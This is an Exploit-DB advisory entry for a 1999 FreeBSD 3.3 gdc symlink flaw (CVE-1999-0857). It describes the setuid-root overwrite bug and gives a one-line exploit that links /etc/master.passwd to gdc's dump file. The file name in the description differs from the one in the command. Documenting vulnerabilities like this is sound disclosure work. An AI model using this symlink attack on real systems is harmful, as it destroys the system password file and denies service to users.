FreeBSD 3.3 gdc Symlink Vulnerability

1999-12-01T00:00:00
ID EDB-ID:19650
Type exploitdb
Reporter Brock Tellier
Modified 1999-12-01T00:00:00

Description

FreeBSD 3.3 gdc Symlink Vulnerability. CVE-1999-0857. Local exploit for freebsd platform

                                        
                                            source: http://www.securityfocus.com/bid/835/info

It is possible to write debug ouput from gdc to a file (/var/tmp/gdb_dump). Unfortunately, gdc follows symbolic links which can be created in tmp and will overwrite any file on the system thanks to it being setiud root. This does not cause any immediate compromises and is more of a denial of service attack since it does not change the permissions of the overwritten files (to say, world writeable or group writeable). Local users are required to be in group wheel (or equivelent) to execute gdc.

ln -s /etc/master.passwd /var/tmp/gated_dump

And then wait for a priviliged user to run gdc dump.